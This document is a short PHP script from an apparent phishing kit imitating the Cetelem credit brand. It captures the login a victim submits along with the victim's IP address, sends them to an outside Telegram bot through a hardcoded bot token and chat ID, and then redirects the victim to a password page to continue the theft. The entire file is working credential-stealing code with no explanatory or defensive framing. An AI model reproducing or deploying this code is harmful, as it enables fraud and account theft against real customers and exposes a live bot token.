<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
if(!empty($_POST['user'])){
$message  = "======[ Cetelem INFO ]======\n";
$message .= "log  : ".$_POST['user']."\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "=====[ Cetelem  INFO]======";
        $token = "6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4263630620&text=" . urlencode($message)."" );
header("Location:./password.php");
}else{
header("Location:./password.php");
}

?>